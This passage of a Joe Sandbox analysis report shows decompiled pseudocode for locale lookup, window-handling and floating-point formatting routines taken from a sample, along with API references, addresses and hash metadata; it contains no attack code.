						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E00DE7BBE(_t23, _t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x00e0048f
0x00e00490
0x00e00497
0x00e0053b
0x00e00554
0x00e0055a
0x00e0055f
0x00e00561
0x00e00561
0x00e00567
0x00e0056a
0x00e0056a
0x00e00556
0x00e00556
0x00000000
0x00e00556
0x00e0049d
0x00e004a2
0x00000000
0x00000000
0x00e004a8
0x00e004ad
0x00e004af
0x00e004af
0x00e004b5
0x00000000
0x00000000
0x00e004ba
0x00e004d1
0x00e004d1
0x00e004da
0x00e004dc
0x00000000
0x00000000
0x00e004de
0x00e004e3
0x00e004e5
0x00e004e5
0x00e004eb
0x00000000
0x00000000
0x00e004f0
0x00e0050e
0x00e00510
0x00e00533
0x00000000
0x00e00538
0x00e0052b
0x00000000
0x00000000
0x00e0052d
0x00000000
0x00e0052d
0x00e004f2
0x00e004fa
0x00000000
0x00000000
0x00e004fc
0x00e004ff
0x00e00505
0x00000000
0x00000000
0x00000000
0x00e00507
0x00e00509
0x00e0050b
0x00000000
0x00e0050b
0x00e004bc
0x00e004c4
0x00000000
0x00000000
0x00e004c6
0x00e004c9
0x00e004cf
0x00000000
0x00000000
0x00000000
0x00e004cf
0x00e004d5
0x00e004d7
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00E007A8,00000002,00000000,?,?,?,00E007A8,?,00000000), ref: 00E00523
GetLocaleInfoW.KERNEL32(?,20001004,00E007A8,00000002,00000000,?,?,?,00E007A8,?,00000000), ref: 00E0054C
GetACP.KERNEL32(?,?,00E007A8,?,00000000), ref: 00E00561

Strings

OCP, xrefs: 00E004DE
ACP, xrefs: 00E004A8

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 5808ac9ebd1dee69f33c2a23984fec03950deb4f565a1941ab269062d52b6c4e
Instruction ID: 223aab0b9c742f047a01c38f9a5e41541edf480f16a23d0e9fa5d1a7a693e0c5
Opcode Fuzzy Hash: 5808ac9ebd1dee69f33c2a23984fec03950deb4f565a1941ab269062d52b6c4e
Instruction Fuzzy Hash: 20210672600101AAD734CF55DC01BEB73A6EB54B28F569420EA4AF7190E732DEC0CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00D06FDD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82
windowCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00D06FDD(void* __ebx, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v0;
				signed int _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t13;
				signed int _t16;
				int _t29;
				unsigned int _t33;
				void* _t36;
				signed int _t40;
				void* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t36 = __edx;
				_t31 = __ecx;
				_t30 = __ebx;
				_t44 = _a4;
				if(_t44 == 0) {
					E00CAA4E7(__ebx, __ecx, _t41, _t44, __eflags);
					asm("int3");
					_push(_t44);
					_push(_t41);
					_t45 = __ecx;
					_t13 = E00CB778C(__ecx);
					asm("sbb edx, edx");
					_t40 = ( ~_v8 & 0x00100000) + 0x100000;
					__eflags = _t40 & _t13;
					if((_t40 & _t13) != 0) {
						L16:
						__eflags = 0;
						return 0;
					}
					_push(1);
					_t42 = E00D06FDD(__ebx, 0x100000, _t40, _t45);
					__eflags = _t42;
					if(_t42 == 0) {
						goto L16;
					}
					_t16 = GetDlgCtrlID( *(_t45 + 0x20));
					_t10 = _t16 - 0xe900; // -59648
					_t33 = _t10;
					__eflags = _t33 - 0xff;
					if(_t33 > 0xff) {
						goto L16;
					}
					__eflags = _v0;
					if(_v0 != 0) {
						_t19 = (_t33 >> 4) + 0xea10;
						__eflags = (_t33 >> 4) + 0xea10;
					} else {
						_t19 = (_t16 & 0x0000000f) + 0xea00;
					}
					return E00CB76C2(_t42, _t19);
				}
				_t43 = E00CB277F(__ebx, _t31, _t36, GetParent( *(_t44 + 0x20)));
				_t35 = _t43;
				if(E00CACB0B(_t43, ?str?) == 0) {
					L7:
					__eflags = 0;
					return 0;
				}
				if(_a8 != 0) {
					L6:
					return _t43;
				}
				while(1) {
					_t44 = E00CB277F(_t30, _t35, _t36, GetParent( *(_t44 + 0x20)));
					if(_t44 == 0) {
						goto L6;
					}
					_t29 = IsIconic( *(_t44 + 0x20));
					__eflags = _t29;
					if(_t29 != 0) {
						goto L7;
					}
				}
				goto L6;
			}

0x00d06fdd
0x00d06fdd
0x00d06fdd
0x00d06fe1
0x00d06fe7
0x00d07040
0x00d07045
0x00d07049
0x00d0704a
0x00d0704b
0x00d0704d
0x00d0705c
0x00d07060
0x00d07062
0x00d07064
0x00d070af
0x00d070af
0x00000000
0x00d070af
0x00d07066
0x00d0706e
0x00d07070
0x00d07072
0x00000000
0x00000000
0x00d07077
0x00d0707d
0x00d0707d
0x00d07083
0x00d07089
0x00000000
0x00000000
0x00d0708b
0x00d0708f
0x00d070a0
0x00d070a0
0x00d07091
0x00d07094
0x00d07094
0x00000000
0x00d070a8
0x00d06ff8
0x00d06fff
0x00d07008
0x00d07038
0x00d07038
0x00000000
0x00d07038
0x00d0700e
0x00d07034
0x00000000
0x00d07034
0x00d0701f
0x00d0702e
0x00d07032
0x00000000
0x00000000
0x00d07015
0x00d0701b
0x00d0701d
0x00000000
0x00000000
0x00d0701d
0x00000000

APIs

GetParent.USER32(?), ref: 00D06FEC
IsIconic.USER32 ref: 00D07015
GetParent.USER32(?), ref: 00D07022
GetDlgCtrlID.USER32 ref: 00D07077

Strings

(, xrefs: 00D06FFA

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Parent$CtrlIconic
String ID: (
API String ID: 2592416295-374781203
Opcode ID: 78cc51f073af774a66e2415bbf7703c0bc4ce4c952a089330a87546fab625cb0
Instruction ID: 4c3173a1d0e50f259b971b4b0631b38b6ff408551e11571b701b438de77649eb
Opcode Fuzzy Hash: 78cc51f073af774a66e2415bbf7703c0bc4ce4c952a089330a87546fab625cb0
Instruction Fuzzy Hash: 5E212932E085056BDB316A25DC04BEA327AFF947A1F088634F949EA1D0DE25F80096B1

Uniqueness

Uniqueness Score: -1.00%

Function 00E0303E Relevance: 6.4, Strings: 4, Instructions: 1427
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 69%

			E00E0303E(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v464;
				void _v468;
				signed int _v472;
				char _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1868;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				intOrPtr _v1888;
				signed int _v1892;
				signed int _v1896;
				signed int _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1928;
				char _v1932;
				signed int _v1940;
				signed int _v1944;
				char _v2404;
				signed int _v2408;
				signed int _v2436;
				signed int _t797;
				intOrPtr _t807;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t826;
				signed int _t832;
				signed int _t834;
				signed int _t841;
				signed int _t846;
				intOrPtr _t852;
				void* _t853;
				signed int _t859;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t869;
				signed int _t871;
				signed int _t873;
				signed int _t874;
				signed int _t876;
				signed int _t877;
				signed int _t878;
				signed int _t883;
				signed int _t886;
				signed int _t889;
				signed int _t895;
				signed int _t896;
				signed int _t904;
				signed int _t907;
				signed int _t912;
				char* _t915;
				signed int _t919;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				char* _t934;
				signed char _t937;
				signed int _t943;
				signed int _t945;
				signed int _t949;
				signed int _t952;
				signed int _t960;
				signed int _t963;
				signed int _t965;
				signed int _t968;
				signed int _t977;
				signed int _t978;
				signed int _t981;
				signed int _t994;
				signed int _t995;
				signed int _t996;
				signed int _t997;
				signed int* _t998;
				signed char _t1001;
				signed int* _t1004;
				signed int _t1007;
				signed int _t1009;
				signed int _t1013;
				signed int _t1016;
				signed int _t1024;
				signed int _t1027;
				signed int _t1030;
				signed int _t1033;
				signed int _t1042;
				intOrPtr _t1047;
				signed int _t1048;
				signed int _t1054;
				void* _t1062;
				signed int _t1063;
				signed int _t1064;
				signed int _t1065;
				signed int _t1068;
				signed int _t1076;
				signed int _t1080;
				signed int _t1082;
				signed int _t1087;
				void* _t1093;
				signed int _t1094;
				signed int _t1095;
				signed int _t1096;
				signed int _t1099;
				signed int _t1104;
				signed int _t1105;
				signed int _t1109;
				signed int _t1111;
				signed int _t1116;
				signed char _t1123;
				void* _t1124;
				signed int _t1129;
				intOrPtr* _t1136;
				signed int _t1140;
				signed int _t1147;
				signed int _t1148;
				signed int _t1153;
				signed int _t1155;
				signed int _t1156;
				signed int _t1157;
				signed int _t1160;
				signed int _t1164;
				signed int _t1165;
				signed int _t1166;
				signed int _t1168;
				signed int _t1169;
				signed int _t1170;
				signed int _t1172;
				signed int _t1173;
				signed int _t1174;
				signed int _t1175;
				signed int _t1177;
				signed int _t1178;
				signed int _t1179;
				signed int _t1181;
				signed int _t1182;
				unsigned int _t1183;
				unsigned int _t1187;
				unsigned int _t1190;
				signed int _t1191;
				signed int _t1194;
				signed int* _t1197;
				signed int _t1200;
				void* _t1202;
				unsigned int _t1203;
				signed int _t1204;
				signed int _t1207;
				signed int* _t1210;
				signed int _t1213;
				signed int _t1216;
				signed int _t1217;
				signed int _t1218;
				signed int _t1219;
				signed int _t1222;
				signed int _t1227;
				signed int _t1228;
				signed int _t1230;
				signed int _t1231;
				signed int _t1232;
				signed int _t1233;
				signed int _t1234;
				signed int _t1235;
				signed int _t1236;
				signed int _t1238;
				signed int _t1240;
				signed int _t1241;
				signed int _t1242;
				signed int _t1243;
				signed int _t1244;
				signed int _t1246;
				void* _t1247;
				signed int _t1248;
				signed int _t1250;
				signed int _t1255;
				void* _t1259;
				intOrPtr _t1260;
				void* _t1261;
				void* _t1264;
				unsigned int _t1267;
				signed int _t1268;
				signed int _t1269;
				signed int _t1270;
				signed int _t1271;
				signed int _t1272;
				signed int _t1273;
				signed int _t1276;
				signed int _t1277;
				signed int _t1278;
				signed int _t1279;
				signed int _t1282;
				signed int _t1283;
				signed int _t1284;
				void* _t1285;
				void* _t1288;
				signed int _t1290;
				signed int _t1294;
				signed int _t1296;
				signed int _t1300;
				void* _t1301;
				signed int _t1302;
				void* _t1303;
				signed int _t1305;
				signed int _t1306;
				signed int _t1308;
				void* _t1311;
				signed int _t1313;
				signed int _t1314;
				signed int _t1316;
				signed int _t1317;
				signed int _t1319;
				signed int _t1326;
				void* _t1328;
				signed int* _t1329;
				signed int* _t1331;
				signed int _t1334;
				signed int _t1343;

				_t1301 = __esi;
				_t1259 = __edi;
				_t1216 = __edx;
				_t797 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t797 ^ _t1326;
				_v1928 = _a16;
				_v1896 = _a20;
				_push(__ebx);
				E00E066A9(__eflags,  &_v1940);
				_t1123 = 1;
				if((_v1940 & 0x0000001f) != 0x1f) {
					E00E06711(__eflags,  &_v1940);
					_v1932 = 1;
				} else {
					_v1932 = 0;
				}
				_push(_t1301);
				_t1302 = _a8;
				_push(_t1259);
				_t1260 = 0x20;
				_t1334 = _t1302;
				if(_t1334 > 0 || _t1334 >= 0 && _a4 >= 0) {
					_t807 = _t1260;
				} else {
					_t807 = 0x2d;
				}
				_t1136 = _v1928;
				 *_t1136 = _t807;
				 *((intOrPtr*)(_t1136 + 8)) = _v1896;
				E00DF3B4F( &_v1944, 0, 0);
				_t1329 = _t1328 + 0xc;
				if((_t1302 & 0x7ff00000) != 0) {
					L14:
					_t814 = E00DF5D0A( &_a4);
					_pop(_t1139);
					__eflags = _t814;
					if(_t814 != 0) {
						_t1139 = _v1928;
						 *((intOrPtr*)(_v1928 + 4)) = _t1123;
					}
					_t815 = _t814 - 1;
					__eflags = _t815;
					if(_t815 == 0) {
						_t816 = E00DEC84C(_v1896, _a24, "1#INF");
						__eflags = _t816;
						if(_t816 != 0) {
							goto L311;
						} else {
							_t1123 = 0;
							__eflags = 0;
							goto L308;
						}
					} else {
						_t832 = _t815 - 1;
						__eflags = _t832;
						if(_t832 == 0) {
							_push("1#QNAN");
							goto L12;
						} else {
							_t834 = _t832 - 1;
							__eflags = _t834;
							if(_t834 == 0) {
								_push("1#SNAN");
								goto L12;
							} else {
								__eflags = _t834 == 1;
								if(_t834 == 1) {
									_push("1#IND");
									goto L12;
								} else {
									_v1920 = _v1920 & 0x00000000;
									_a8 = _t1302 & 0x7fffffff;
									_t1343 = _a4;
									asm("fst qword [ebp-0x75c]");
									_t1305 = _v1884;
									_v1916 = _a12 + 1;
									_t1147 = _t1305 >> 0x14;
									_t841 = _t1147 & 0x000007ff;
									__eflags = _t841;
									if(_t841 != 0) {
										_t841 = 0;
										_t1217 = 0x100000;
										_t39 =  &_v1876;
										 *_t39 = _v1876 & 0;
										__eflags =  *_t39;
									} else {
										_t1217 = 0;
										_v1876 = _t1123;
									}
									_t1306 = _t1305 & 0x000fffff;
									_v1912 = _v1888 + _t841;
									asm("adc esi, edx");
									_t1148 = _t1147 & 0x000007ff;
									_v1868 = _v1876 + _t1148;
									E00E06760(_t1148, _t1343);
									_push(_t1148);
									_push(_t1148);
									 *_t1329 = _t1343;
									E00DF0830(_t1148);
									_t846 = L00DDD790(_t1217);
									_v1904 = _t846;
									_t1264 = 0x20;
									__eflags = _t846 - 0x7fffffff;
									if(_t846 == 0x7fffffff) {
										L25:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t846 - 0x80000000;
										if(_t846 == 0x80000000) {
											goto L25;
										}
									}
									_t1218 = _v1868;
									__eflags = _t1306;
									_v468 = _v1912;
									_v464 = _t1306;
									_t1153 = (0 | _t1306 != 0x00000000) + 1;
									_v1892 = _t1153;
									_v472 = _t1153;
									__eflags = _t1218 - 0x433;
									if(_t1218 < 0x433) {
										__eflags = _t1218 - 0x35;
										if(_t1218 == 0x35) {
											L96:
											__eflags = _t1306;
											_t209 =  &_v1884;
											 *_t209 = _v1884 & 0x00000000;
											__eflags =  *_t209;
											_t852 =  *((intOrPtr*)(_t1326 + 4 + (0 | _t1306 != 0x00000000) * 4 - 0x1d4));
											asm("bsr eax, eax");
											if( *_t209 == 0) {
												_t853 = 0;
												__eflags = 0;
											} else {
												_t853 = _t852 + 1;
											}
											__eflags = _t1264 - _t853 - _t1123;
											asm("sbb esi, esi");
											_t1308 =  ~_t1306 + _t1153;
											__eflags = _t1308 - 0x73;
											if(_t1308 <= 0x73) {
												_t1219 = _t1308 - 1;
												__eflags = _t1219 - 0xffffffff;
												if(_t1219 != 0xffffffff) {
													_t1285 = _t1219 - 1;
													while(1) {
														__eflags = _t1219 - _t1153;
														if(_t1219 >= _t1153) {
															_t1042 = 0;
															__eflags = 0;
														} else {
															_t1042 =  *(_t1326 + _t1219 * 4 - 0x1d0);
														}
														__eflags = _t1285 - _t1153;
														if(_t1285 >= _t1153) {
															_t1183 = 0;
															__eflags = 0;
														} else {
															_t1183 =  *(_t1326 + _t1219 * 4 - 0x1d4);
														}
														 *(_t1326 + _t1219 * 4 - 0x1d0) = _t1183 >> 0x0000001f | _t1042 + _t1042;
														_t1219 = _t1219 - 1;
														_t1285 = _t1285 - 1;
														__eflags = _t1219 - 0xffffffff;
														if(_t1219 == 0xffffffff) {
															goto L111;
														}
														_t1153 = _v472;
													}
												}
												L111:
												_v472 = _t1308;
											} else {
												_v1400 = _v1400 & 0x00000000;
												_v472 = _v472 & 0x00000000;
												E00DE686E( &_v468, 0x1cc,  &_v1396, 0);
												_t1329 =  &(_t1329[4]);
											}
											_t1267 = 0x434 >> 5;
											E00DDFBE0(0x434 >> 5,  &_v1396, 0, 0x434);
											__eflags = 1;
											 *(_t1326 + 0xbad63d) = 1 << (0x00000434 - _v1868 & 0x0000001f);
										} else {
											_v1396 = _v1396 & 0x00000000;
											_v1392 = 0x100000;
											_v1400 = 2;
											__eflags = _t1306;
											if(_t1306 != 0) {
												_t1247 = 0;
												__eflags = 0;
												while(1) {
													_t1047 =  *((intOrPtr*)(_t1326 + _t1247 - 0x570));
													__eflags = _t1047 -  *((intOrPtr*)(_t1326 + _t1247 - 0x1d0));
													if(_t1047 !=  *((intOrPtr*)(_t1326 + _t1247 - 0x1d0))) {
														goto L96;
													}
													_t1247 = _t1247 + 4;
													__eflags = _t1247 - 8;
													if(_t1247 != 8) {
														continue;
													} else {
														__eflags = 0;
														asm("bsr eax, esi");
														_v1884 = 0;
														if(0 == 0) {
															_t1048 = 0;
														} else {
															_t1048 = _t1047 + 1;
														}
														__eflags = _t1264 - _t1048 - 2;
														asm("sbb esi, esi");
														_t1319 =  ~_t1306 + _t1153;
														__eflags = _t1319 - 0x73;
														if(_t1319 <= 0x73) {
															_t1248 = _t1319 - 1;
															__eflags = _t1248 - 0xffffffff;
															if(_t1248 != 0xffffffff) {
																_t1288 = _t1248 - 1;
																while(1) {
																	__eflags = _t1248 - _t1153;
																	if(_t1248 >= _t1153) {
																		_t1054 = 0;
																	} else {
																		_t1054 =  *(_t1326 + _t1248 * 4 - 0x1d0);
																	}
																	__eflags = _t1288 - _t1153;
																	if(_t1288 >= _t1153) {
																		_t1187 = 0;
																	} else {
																		_t1187 =  *(_t1326 + _t1248 * 4 - 0x1d4);
																	}
																	 *(_t1326 + _t1248 * 4 - 0x1d0) = _t1187 >> 0x0000001e | _t1054 << 0x00000002;
																	_t1248 = _t1248 - 1;
																	_t1288 = _t1288 - 1;
																	__eflags = _t1248 - 0xffffffff;
																	if(_t1248 == 0xffffffff) {
																		goto L94;
																	}
																	_t1153 = _v472;
																}
															}
															L94:
															_v472 = _t1319;
														} else {
															_v1400 = 0;
															_v472 = 0;
															E00DE686E( &_v468, 0x1cc,  &_v1396, 0);
															_t1329 =  &(_t1329[4]);
														}
														_t1267 = 0x435 >> 5;
														E00DDFBE0(0x435 >> 5,  &_v1396, 0, 0x435);
														 *(_t1326 + 0xbad63d) = 1 << (0x00000435 - _v1868 & 0x0000001f);
													}
													goto L113;
												}
											}
											goto L96;
										}
										L113:
										_t859 = _t1267 + 1;
										_t1311 = 0x1cc;
										_v1400 = _t859;
										_v936 = _t859;
										E00DE686E( &_v932, 0x1cc,  &_v1396, _t859 << 2);
										_t1331 =  &(_t1329[7]);
										_t1123 = 1;
										__eflags = 1;
									} else {
										_v1396 = _v1396 & 0x00000000;
										_v1392 = 0x100000;
										_v1400 = 2;
										__eflags = _t1306;
										if(_t1306 == 0) {
											L53:
											_t1190 = _t1218 - 0x432;
											_t1191 = _t1190 & 0x0000001f;
											_v1900 = _t1190 >> 5;
											_v1876 = _t1191;
											_v1920 = _t1264 - _t1191;
											_t1062 = E00E07000(_t1123, _t1264 - _t1191, 0);
											_t1250 = _v1892;
											_t1063 = _t1062 - 1;
											_t128 =  &_v1872;
											 *_t128 = _v1872 & 0x00000000;
											__eflags =  *_t128;
											_v1912 = _t1063;
											_t1064 =  !_t1063;
											_v1884 = _t1064;
											asm("bsr eax, ecx");
											if( *_t128 == 0) {
												_t136 =  &_v1880;
												 *_t136 = _v1880 & 0x00000000;
												__eflags =  *_t136;
											} else {
												_v1880 = _t1064 + 1;
											}
											_t1194 = _v1900;
											_t1311 = 0x1cc;
											_t1065 = _t1250 + _t1194;
											__eflags = _t1065 - 0x73;
											if(_t1065 <= 0x73) {
												__eflags = _t1264 - _v1880 - _v1876;
												asm("sbb eax, eax");
												_t1068 =  ~_t1065 + _t1250 + _t1194;
												_v1908 = _t1068;
												__eflags = _t1068 - 0x73;
												if(_t1068 > 0x73) {
													goto L57;
												} else {
													_t1290 = _t1194 - 1;
													_t1076 = _t1068 - 1;
													_v1872 = _t1290;
													_v1868 = _t1076;
													__eflags = _t1076 - _t1290;
													if(_t1076 != _t1290) {
														_t1294 = _t1076 - _t1194;
														__eflags = _t1294;
														_t1197 =  &(( &_v472)[_t1294]);
														_v1892 = _t1197;
														while(1) {
															__eflags = _t1294 - _t1250;
															if(_t1294 >= _t1250) {
																_t1080 = 0;
																__eflags = 0;
															} else {
																_t1080 = _t1197[1];
															}
															_v1880 = _t1080;
															_t156 = _t1294 - 1; // -4
															__eflags = _t156 - _t1250;
															if(_t156 >= _t1250) {
																_t1082 = 0;
																__eflags = 0;
															} else {
																_t1082 =  *_t1197;
															}
															_t1200 = _v1868;
															 *(_t1326 + _t1200 * 4 - 0x1d0) = (_t1082 & _v1884) >> _v1920 | (_v1880 & _v1912) << _v1876;
															_t1087 = _t1200 - 1;
															_t1197 = _v1892 - 4;
															_v1868 = _t1087;
															_t1294 = _t1294 - 1;
															_v1892 = _t1197;
															__eflags = _t1087 - _v1872;
															if(_t1087 == _v1872) {
																break;
															}
															_t1250 = _v472;
														}
														_t1194 = _v1900;
													}
													__eflags = _t1194;
													if(_t1194 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1194 << 2);
														_t1329 =  &(_t1329[3]);
													}
													_v472 = _v1908;
												}
											} else {
												L57:
												_v1400 = 0;
												_v472 = 0;
												E00DE686E( &_v468, _t1311,  &_v1396, 0);
												_t1329 =  &(_t1329[4]);
											}
											_v1396 = 2;
											_push(4);
										} else {
											_t1202 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1326 + _t1202 - 0x570)) -  *((intOrPtr*)(_t1326 + _t1202 - 0x1d0));
												if( *((intOrPtr*)(_t1326 + _t1202 - 0x570)) !=  *((intOrPtr*)(_t1326 + _t1202 - 0x1d0))) {
													goto L53;
												}
												_t1202 = _t1202 + 4;
												__eflags = _t1202 - 8;
												if(_t1202 != 8) {
													continue;
												} else {
													_t1203 = _t1218 - 0x431;
													_t1204 = _t1203 & 0x0000001f;
													_v1880 = _t1203 >> 5;
													_v1900 = _t1204;
													_v1872 = _t1264 - _t1204;
													_t1093 = E00E07000(_t1123, _t1264 - _t1204, 0);
													_t1255 = _v1892;
													_t1094 = _t1093 - 1;
													_t68 =  &_v1884;
													 *_t68 = _v1884 & 0x00000000;
													__eflags =  *_t68;
													_v1908 = _t1094;
													_t1095 =  !_t1094;
													_v1912 = _t1095;
													asm("bsr eax, ecx");
													if( *_t68 == 0) {
														_t76 =  &_v1876;
														 *_t76 = _v1876 & 0x00000000;
														__eflags =  *_t76;
													} else {
														_v1876 = _t1095 + 1;
													}
													_t1207 = _v1880;
													_t1311 = 0x1cc;
													_t1096 = _t1255 + _t1207;
													__eflags = _t1096 - 0x73;
													if(_t1096 <= 0x73) {
														__eflags = _t1264 - _v1876 - _v1900;
														asm("sbb eax, eax");
														_t1099 =  ~_t1096 + _t1255 + _t1207;
														_v1884 = _t1099;
														__eflags = _t1099 - 0x73;
														if(_t1099 > 0x73) {
															goto L35;
														} else {
															_t1296 = _t1207 - 1;
															_t1105 = _t1099 - 1;
															_v1920 = _t1296;
															_v1868 = _t1105;
															__eflags = _t1105 - _t1296;
															if(_t1105 != _t1296) {
																_t1300 = _t1105 - _t1207;
																__eflags = _t1300;
																_t1210 =  &(( &_v472)[_t1300]);
																_v1892 = _t1210;
																while(1) {
																	__eflags = _t1300 - _t1255;
																	if(_t1300 >= _t1255) {
																		_t1109 = 0;
																		__eflags = 0;
																	} else {
																		_t1109 = _t1210[1];
																	}
																	_v1876 = _t1109;
																	_t96 = _t1300 - 1; // -4
																	__eflags = _t96 - _t1255;
																	if(_t96 >= _t1255) {
																		_t1111 = 0;
																		__eflags = 0;
																	} else {
																		_t1111 =  *_t1210;
																	}
																	_t1213 = _v1868;
																	 *(_t1326 + _t1213 * 4 - 0x1d0) = (_t1111 & _v1912) >> _v1872 | (_v1876 & _v1908) << _v1900;
																	_t1116 = _t1213 - 1;
																	_t1210 = _v1892 - 4;
																	_v1868 = _t1116;
																	_t1300 = _t1300 - 1;
																	_v1892 = _t1210;
																	__eflags = _t1116 - _v1920;
																	if(_t1116 == _v1920) {
																		break;
																	}
																	_t1255 = _v472;
																}
																_t1207 = _v1880;
															}
															__eflags = _t1207;
															if(_t1207 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1207 << 2);
																_t1329 =  &(_t1329[3]);
															}
															_v472 = _v1884;
														}
													} else {
														L35:
														_v1400 = 0;
														_v472 = 0;
														E00DE686E( &_v468, _t1311,  &_v1396, 0);
														_t1329 =  &(_t1329[4]);
													}
													_t1104 = 4;
													_v1396 = _t1104;
													_push(_t1104);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_v1392 = _v1392 & 0x00000000;
										_push( &_v1396);
										_v936 = _t1123;
										_push(_t1311);
										_push( &_v932);
										_v1400 = _t1123;
										E00DE686E();
										_t1331 =  &(_t1329[4]);
									}
									_t864 = _v1904;
									_t1155 = 0xa;
									_v1912 = _t1155;
									__eflags = _t864;
									if(_t864 < 0) {
										_t865 =  ~_t864;
										_t866 = _t865 / _t1155;
										_v1892 = _t866;
										_t1156 = _t865 % _t1155;
										_v1920 = _t1156;
										__eflags = _t866;
										if(_t866 == 0) {
											L246:
											__eflags = _t1156;
											if(_t1156 != 0) {
												_t912 =  *(0xe41d14 + _t1156 * 4);
												_v1884 = _t912;
												__eflags = _t912;
												if(_t912 == 0) {
													L258:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L259;
												} else {
													__eflags = _t912 - _t1123;
													if(_t912 != _t1123) {
														_t1166 = _v472;
														__eflags = _t1166;
														if(_t1166 != 0) {
															_v1872 = _v1872 & 0x00000000;
															_t1273 = 0;
															__eflags = 0;
															do {
																_t1232 = _t912 *  *(_t1326 + _t1273 * 4 - 0x1d0) >> 0x20;
																 *(_t1326 + _t1273 * 4 - 0x1d0) = _t912 *  *(_t1326 + _t1273 * 4 - 0x1d0) + _v1872;
																_t912 = _v1884;
																asm("adc edx, 0x0");
																_t1273 = _t1273 + 1;
																_v1872 = _t1232;
																__eflags = _t1273 - _t1166;
															} while (_t1273 != _t1166);
															__eflags = _t1232;
															if(_t1232 != 0) {
																_t919 = _v472;
																__eflags = _t919 - 0x73;
																if(_t919 >= 0x73) {
																	goto L258;
																} else {
																	 *(_t1326 + _t919 * 4 - 0x1d0) = _t1232;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t866 - 0x26;
												if(_t866 > 0x26) {
													_t866 = 0x26;
												}
												_t1167 =  *(0xe41c7e + _t866 * 4) & 0x000000ff;
												_v1900 = _t866;
